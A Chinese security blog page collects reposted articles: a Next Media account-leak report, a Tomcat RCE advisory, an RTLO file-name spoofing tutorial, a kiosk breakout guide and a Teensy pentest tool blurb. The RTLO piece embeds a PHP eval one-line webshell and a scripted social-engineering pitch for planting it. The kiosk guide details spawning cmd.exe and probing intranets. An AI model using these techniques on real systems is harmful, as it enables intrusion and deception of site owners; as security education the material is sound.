分类 展示类 下的文章

香港壹传媒步Gmail后尘,数十万明文密码遭泄露

周二在国外某黑客论坛发现,香港媒体大亨壹传媒(nextmedia.com)数十万用户账号信息泄露,包括邮箱,明文密码和手机号在内的账户信息被发布到了论坛上(https://evilzone.org/news-and-announcements/nextmedia-data-leakage)。发布这些账号信息的注册用户表示,用户数据超过50万,更新时间截至2014年9月,验证密码正确性高达80%以上。截止目前为止壹传媒尚未对此事发表任何声明,网站也未提示用户更改密码。



根据发布网站全球排名的Alexa提供的排名信息,该网站目前全球排名1654,香港地区排名第10。



同前段时间炒得沸沸扬扬的gmail数据泄露相似,发布这些账号信息的注册用户也搭建了相关的数据查询网站。如有你有在壹传媒网站注册
用户,想要查询你的账号是不是在泄露的名单里,可以登录该网站,输入自己的邮箱账号即可。为了保险起见,不管你是否在这个名单上,还是换掉你的密码吧。用
户可以通过一个名为“Next Media Has Been Pwned ,Is your password
leaked?”的网站(http://www.pwnnextmedia.com)查询自己的用户数据是否被泄露。



背景:
壹传媒有限公司简称壹传媒;英语:Next Media Ltd.;港交所:0282)是一家中文传媒企业,成立于1990年,于2000年2月16日透过百乐门出版集团有限公司换取于香港交易所主板上市。于1999年以前主要从事印刷及分色制版服务及杂志出版,其业务版图横跨香港与台湾,在港台两地出版多份报纸、杂志,曾经在台湾经营电视台——壹电视,及多媒体平台网络协定电视壹网乐。其他业务包括广告、印刷及分色制版服务。壹传媒旗下的刊物大多有在互联网上提供完整内容并在互联网刊登广告,公司在香港注册,董事会主席为黎智英,行政总裁为张嘉声

Apache警告:Tomcat存在远程代码执行漏洞



 





开源WEB容器–Apache+Tomcat老版本很容易受到远程代码执行的攻击。Mark Thomas,一位长期致力于Apache+Tomcat的工作者称

“在某种情况下,用户可以上传恶意JSP文件到Tomcat服务器上运行,然后执行命令。JSP的后门可以用来在服务器上任意执行命令。”

Thomas今日发出警告称,Tomcat版本7.0.0和7.3.9在发布补丁之前是脆弱的。利用漏洞(CVE-2014-4444)可执行远程代码执行攻击。上周VMware安全工程部,通信与响应小组(vSECR)的Pierre Ernst挖掘出了这个漏洞。

但官方同时也表示,这个漏洞谈起来容易,但实施攻击有难度。攻击者必须达成的一定条件——其中包括:Oracle Java 1.7.0 update 25,或者Tomcat中的更早的脆弱版本。值得一提的是,该系统的文件路径必须保证可写,而JMX环境的自定义侦听器必须配置且绑定到本地localhost以外的地址。正因为这些限制,Tomcat的安全团队把该漏洞从严重降级为重要,严重程度往往与远程执行漏洞相关。

Apache团队鼓励用户升级到Tomcat7.0.40,或者将他们的Oracle Java升级到1.7.0来减轻危害,要不然就只能等到以后再修补它了。

[参考信息来源threatpost.com,译/FreeBuf实习小编dawner,转载请注明来自FreeBuf.COM]

浅谈RTLO技术

我在FreeBuf上到了 [APT攻击]趋势科技捕获一次APT攻击活动 这篇文章,然后就自己去探探究竟,文章地址在下面

传送门

RLO控制符是Unicode控制符的一种,使得字符显示从右至左的顺序,攻击者可以利用RTLO技术来达到欺骗目标,从而使得可执行文件的运行

首先Windows系统在解析文件名时,当遇到unicode控制符时,会改变文件名的显示方式,利用这一特性,可以将exe、scr、com等可执行文件伪装成doc、jpg、txt、ppt等

例如:我首先创建一个bat文件,命名为txt.bat,里面内容写为ping baidu.com,下面就是重点了,我们进行重命名,选择“插入unicode控制字符”,然后就到了这个菜单栏,我们选择RLO,输入txt.bat
<ignore_js_op> <ignore_js_op>

我们可以看到此时文件名已经显示为tab.txt
<ignore_js_op> <ignore_js_op>

不过我们看到它是一个window批处理文件(bat),可以正常执行指令

当然文件的图标方面也是可以修改的,这样可以显得文件的确是一个txt文档,从而诱使目标打开,增加成功几率

简单的一笔

给自己做个记录
 科学研究话题:HTML文件是否可以变为WEBSHELL

测试环境:Linux+Apache+Php
Linux+Nginx+Php

<ignore_js_op>
<ignore_js_op>

从上面2幅图可以看到HTML是没有办法充当一句话的,但是现在我们需要的就是把HTML变为PHP文件,这个可能实现吗?完全有可能!!!这里需要运用到RTLO技术,来进行欺骗,我个人认为目前这种方法适用于社会工程学攻击方面比较得体。

<ignore_js_op>

可以看到运用RTLO技术,我们已经把html.php变为了php.html,这样我们可以用于欺骗。如何欺骗?下面是虚构的一篇对话!当然方法不唯一!

===>攻击者事先把恶意代码放入HTML中(<?php @eval($_POST['sys']);?>)

→攻击者:你是xxx的站长吗?我有一个小广告想挂在你的网站上面。
→站长:嗯,你好,我是xxx的站长。
→攻击者:站长,是这样的,我想先把一个HTML放进去,看看效果,如果效果不错,就可以付款,然后正式开始合作。
→站长:嗯,行,那你把HTML文件传过来吧。
→站长: www.xxx.com/php.html,你看看去吧,如果效果不错,我就去放置了。

其实这个时候php.html文件早以不存在了,而在linux下面它会这样显示?lmth.php,这样它就变为了一个可执行文件php,从而攻击者可以获取到webshell。
为了还原现场,我把已经运用RTLO技术的php.html上传到服务器,由于linux没有unicode控制符这么一说,所以linux会还原为lmth.php(这个为windows下运用RTLO输入时的场景)


<ignore_js_op>

攻击者从而就可以获取到webshell了,www.xxx.com/%3flmth.php。

<ignore_js_op>

安全科普:终端机安全,教你如何搞定各种各样的终端机

早上微博收到一条at,是SniFFeR.Pro团队的p0tt1发表了一篇关于终端机安全的总结文章,看了下总结的很到位,文章写的很用心,非常感谢p0tt1的分享,我把这个文章转载到我博客分享一下,顺便再加两个简单粗暴的方法

1.到终端机后部找电源线,直接拔掉再插上等待重启。

2.到终端机后部或者侧面找关机或重启一类的按钮。
这两种方法进去之后一般是windows桌面,或者几秒钟后自动弹出软件。

 

文章尾部已附上来源地址。 

特别声明:本文提供一些绕过终端机的方法,仅用于安全学习及教学用图,禁止非法利用。本文旨在提高市面上终端机的安全性,避免其遭到恶意破坏。

定场诗

妖都地铁售票终端      不知道肿么了,cmd君出来say hi了~
帝都机场导航终端      堪称业界典范,但是好像不经戳啊~
魔都地铁售票终端      一向规规矩矩大家闺秀,小内内能不能不侧漏?
6C古都社区缴费终端    击键限制好像罢工了,双击单击三连击,根本停不下来?
...
......

写在前面

之前笔者在微信上经常曝光一些搞定的终端机的图片,引起了大家的兴趣,当然了,每次搞定的方法都不一样,并且手机回复大家挨个回复过程实在是有够XO,于是乎有了此文,能够总结下方法,自认大牛级别的绕过,因为您总有不一样的方法搞定,并且您的槽点总是那么的低,给你一记么么哒,下次到评论楼层登门拜访。这里给科普下我使用过的几种方法和常见的绕过的小技巧。

0×001 什么是终端机?

来来来,上图上图:

好的,类似上图的呢,就是我们常见的终端机了,其实这样的终端机操作性,易用性和实用性都是很不错的,毕竟生活在一个上厕所都排队的环境下,立几台这样的机器确实能解决各种办事单位的办事排队难问题,好的,这不是重点,毕竟我们是来[*]你的!

综上所述:终端机就是被各种变形金刚形状各异的盒子包裹起来的运行着各种各样系统并且能半交互式给客户提供服务的机器!(头一次自己定义,感觉定义好长~~~,女票说:长点好)

恩,好的,那么顺着小编同学经常说的,走近科学:终端机真的安全吗?

广告之后进入下一个环节。

0×002 怎么才算搞定了终端机?

这个搞定嘛,有很多种,比如说开篇提到的各种问题。

弹出和操作cmd(linux当然就shell啦)
显示并可以操作原操作系统的桌面
资源管理器
注册表管理器
````````

总之拿到这些,咱么就算针对该终端机搞定或者获取了权限

其实安全攻防真是很奇妙的事情,防护的措施有成千上万种,黑客攻击的方法就那么几种,但是绕过各种防护措施的方法加上黑客本身会的方法,大家就认为黑客要具备成千上万的技能,我表示有些无语,我们会的,都是你们教的!亦或是你们逼的!(不好意思,我是一个哲人)

0×003 终端机的分类

我的分类比较简单,简单分类有利于下面说针对的绕过方法

  1. 键鼠操作型终端机
  2. 触控操作型终端机

顾名思义,思不了的我真的帮不了你~

0×004 搞定终端机的方法

【键鼠操作型终端机】

这种类型的终端机对我们来说相对方便,因为拥有了键盘和鼠标,操作起来也比较方便。

前面没有提到的是终端机的防护方法,我不想提是因为这些防护方法实在是烂透了,直接讲讲绕过。

这种类型终端机往往会禁用右键,禁用win键,禁用c-a-d组合键(ctrl-alt-del)等等等等

为什么禁用这么多功能还能用呢,因为本身主题界面就是一个网页,所以不影响用户体验

此处可以有图,楼下银行拍的:

从上图可以看见:

很显然是一个ie浏览器,为什么是ie?对比几个浏览器的字体显示和控件表现情况就知道了~

然后系统坑爹的是做了绿色框里面的两个控件框把工具栏,地址栏,设置和显示什么的都遮住了~

之前说过了禁用了很多的按键和组合,所以突然想到alt+f4的同学请自己呵呵下。

上面只是介绍一个典型的案例很多键鼠操作型终端机都是类似这样,面对这样的终端机,大家可以先测试那些方法呢?我们一一排列:

  1. 程序员预留后门尝试:

    你要尝试的是双击右键的尝试,看看会不会有菜单,或三击右键等等~~~这尼玛是程序员自己留的
  2. 很多程序员些程序的时候没有采用固定边框

    什么?可以调节边框?是的,把鼠标顶到一个最顶角,然后单击左键后往屏幕中央拉,咦?是不是很像刮刮乐?桌面君粗线了?
  3. 疯狂点击法

    别笑,再好的程序都有崩溃的可能性,咱么不讨论遮罩那一块的程序,如果你在ie浏览器里不停的点链接,或者是遮罩软件上面那一排前进后退什么的,程序可能就崩溃退出了。(这个方法在很多办事大厅或者药房里屡试不爽,所以,技术搞不定的,麒麟臂就可以!)
  4. 类outlook的方法

    很多网页上有联系我们啊,招聘联络啊,老总信箱啊什么的,你点击以后,浏览器就不争气的去调用outlook去了,打开后你可以在outlook里选择上传附件什么的,弹出文件选择框,然后?然后你找cmd去呗!什么?权限低?没事,还在文件选择框里,这里可以右键了一般,新建1.txt,里面写上cmd,然后重命名1.bat,好的,这下终于可以丢肥皂了。
  5. xss的方法

    我是真的不想说这个,有xss还说个毛线呢?随便找个搜索,然后 弹弹弹~弹出cmd~
  6. 手残法

    长按,鼠标左键点住页面不要松,谁tm知道程序员设置了右键触发时间是多少毫秒?多等会呗,又不会怀孕~
  7. 补充1:

    前面说预留后门什么的长按什么的或者三连击什么,能够看到网页上的右键菜单后怎么办?右键菜单里有“打印”,点开后后下一步啊,安装控件啊什么的,看到“浏览”按钮就行了,点一下,文件选择框就出来了,然后就跟方法4一样了撒
  8. 补充2:不常用的小技巧,比如上面那张图,比如前面的方法都失败了

    你还可以点击一下前进或者后退,刷新也行,这样ie浏览器的输入焦点就在地址栏里了,那么看不见,被挡住了,你就盲输呗,输入:c:\windows\system32\cmd.exe 然后回车,一般直接弹出,不过现在淘汰xp,如果弹不出的话,请在回车后按两次alt+R,这个一般是不封的,这个是win7的ie下载cmd.exe后不是保存而是直接运行的快捷键:

上图上图:

其实还有很多方法,不过就大同小异了,归根结底,要么能弹!要么能调!要么能写!要么能下!

最终能看到你要运行的文件就成功一半,能运行就完全成功了。并不高深~

【触控操作型终端机】

这样的终端机现在很流行了比如这样的:

这样的触屏终端机一般没有完整的键盘和鼠标靠点击和触控来操作,其实搞定它的方法和键鼠操作型的终端机是一样的,你可以这样想,触屏技术就是将手指点触模拟成鼠标操作,那么,鼠标操作跟上文就没去别了撒?

  1. 长按法

    这个一样道理,长按不会怀孕,你就按会儿吧,万一菜单出来了呢?
  2. 多指触控

    就是两个手指或三个手指放在页面上,等待~谁知道程序猿大哥那天吃的药是不是路边摊买的?我就遇到过四指同时长按10秒出菜单的(某车站站台广告屏)
  3. 类苹果系统的操作手势

    这个就像mac的触控板,你一个手指按住另一个手指不停单击(两指或三指模式),然后菜单就出来了
  4. 非固定边框法

    一样道理,有光标的,用手指把光标移动到边角,按住,然后往屏幕中心拖动,可以显示背后的桌面;没有光标的?直接将手指点在边角,按住,往屏幕中心拖。
  5. 对角线法

    这个可能是管理人员为了省事让程序员苦逼做的,就是一个手指放在右下角,一个手指在左上角,同时向屏幕中心移动,然后?然后程序最小化了

弹出菜单之后和键鼠操作型的终端机同理,弹出cmd,看看内网,ipc试试弱口令神马的就行。

0×005 关于系统的补充说明

如果你发现终端机屏幕很小,字体很熟悉,那么请用手势吧,因为他可能就是一个安卓平板或者ipad,五指一抓,清洁溜溜~安卓系统很多应用没写好,疯狂点击就xxx.apk停止运行,继续或退出!

【I】这种问题我是在某连锁酒店的吧台上的终端机(入住)上发现的,就一ipad

【A】某机场手推车上的实时室内地图导航就一优派的安卓平板

0×006 分享和小交流

先发两张魔都地铁售票的,去了两次,二次搞定,不过点了出票测试,地铁票跟嚼了X迈一样,根本停不下来,只好找工作人员解释测试缘由和道歉- -!

对了,魔都的朋友都知道出租车座椅上的某某传媒的终端机吧?

那个也搞定了,如果你也能获取到权限或者让她重启或关机,可以群里联系我哦~一起交流些~和我们SniFFeR.Pro的小伙伴&Freebuf的小伙伴们一起玩耍~

最后嘛,免责也好,增加槽点也好,提醒大家测试请通知管理人员,获得授权,明哲保身,不要做任何违法的事情,否则以后你就只能看着蜀黍玩这种终端机了:

“咦,好像有什么奇怪的东西进来了,恩~~~好像又没什么不对”

[本文为FreeBuf专栏作者p0tt1原创]

原文地址:http://www.freebuf.com/articles/terminal/42295.html

微型设备(Teensy)渗透测试脚本集Kautilya

Kautilya

Kautilya是一个面向微型设备(Teensy)的渗透测试的工具集。这个工具集提供了很多有用的负载和模块,功能包括下载、执行、键盘记录、密码hash抓取等,可以帮助你做好渗透测试。Kautilya在Windows7,Ubuntu11和Mac OS X Lion下测试通过。

下载地址